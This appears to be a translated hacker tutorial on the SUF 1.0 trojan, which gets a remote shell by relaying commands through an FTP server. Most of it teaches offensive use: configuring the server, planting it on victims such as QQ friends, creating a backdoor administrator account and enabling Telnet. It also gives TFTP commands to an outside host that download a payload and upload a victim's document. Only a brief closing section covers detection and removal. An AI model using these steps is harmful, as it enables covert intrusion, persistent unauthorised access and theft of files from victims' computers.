After countless experiments, a 14-year-old boy launched a new Trojan, SUF 1.0, which uses the "bounce port principle" and "FTP tunneling technology ", that is, the two machines do not directly transmit data, but use the third machine (FTP Server) to exchange data.
As the name suggests, SUF (shell use FTP) is a shell through FTP. This wonderful idea is really amazing. It makes full use of the firewall's "strict security" vulnerability. After the client generates a server, it sends the IP address of the client host to FTP, then someone else downloads the IP address file after running the server, and then uses reverse connections to let the client know that the server is online, and then sends the command to be executed to FTP. Then the server reads the command to be executed in FTP, the execution is completed.
After talking about a bunch of things, is SUF really so powerful? Use facts to describe everything. Come with me ......
I. Configure the server
The general Trojan backdoor is basically the same. First, decompress the downloaded SUF 1.0, and double-click the client.exe in it. The main window appears, which is very concise and clear! Click "configure Server". The configuration dialog window is displayed. You only need to configure FTP service options. Fill in an FTP server with write permission in the "ftp" column, for example, ftp.abc.com or 220.202.242.98. Enter the FTP server port in the "Port" field. The default value is 21. Finally, complete the configuration.
TIPS: If you want to shell the service end, shell the service end (server.exe) before configuring the service end. The server can be configured repeatedly. Make sure that the FTP account you use has the write permission on the FTP server.
2. Play with your hands-easy control
The next step is to play the trojan and backdoor, that is, planting the Trojan. There are many ways and means to plant Trojans. We have also introduced this article in the past. You can use your own talents to upload servers to bots or send them to QQ friends, when the server program is running, it is difficult for general users to feel that the computer is abnormal and the firewall will not trigger an alarm. In fact, a Black Hand is slowly approaching, and the server program will automatically obtain the IP address of the client from the FTP server, and then start reverse connection, the IP address of the server computer appears in the "online list" of the client.
Tip: the client computer must be directly connected to the Internet, not in the Intranet. If the firewall is enabled, open port 5915.
In the online list, double-click the IP address of an online computer (for example, 220.202.242.100). The "connect to 220.202.242.100" dialog box appears, this gives you a shell with system permissions on the target computer. You can do whatever you want!
Think about whether it's a zombie serving the door, or leave a backdoor for future visits! Here we will activate the Guest account, promote it to the Administrator, and then enable the telnet service on the target computer. How can we achieve this? Enter the command: Net user guest/active: Yes, click "run" to activate the Guest account, and then run the command: Net localgroup administrators guest/Add to add the guest to the Administrator group, run the Net start Telnet command to enable the remote logon service on the target computer.
In fact, there are a lot of things that can be used here, such as remote file download/upload through FTP commands or TFTP. Run the command: TFTP 220.202.242.99 get sy.exe;to upload a data file ccash.doc on the chicken to the TFTP server. Run the command: TFTP 220.202.242.99 put ccash.doc.
Tip: Windows comes with a simple file upload/download program tftp.exe. To create a TFTP server, you must use tftpd32.
3. Get rid of control-isolate the tunnel
Although the SUF 1.0 implementation method is very concealed, it can still be destroyed, you can use active ports (: http://www.ldcatv.com/soft/aports.rar) and other real-time port monitoring tools to find and stop it. If the SUF backdoor is in place, you can find two server.exe processes in the "active portslistener" Main Window. One of them communicates with the FTP server through port 4319, and the other with the client computer through port 4321. Select them, and then click "Terminate process" to end the process. Then delete server.exe in the resource manager, thus getting rid of SUF control.
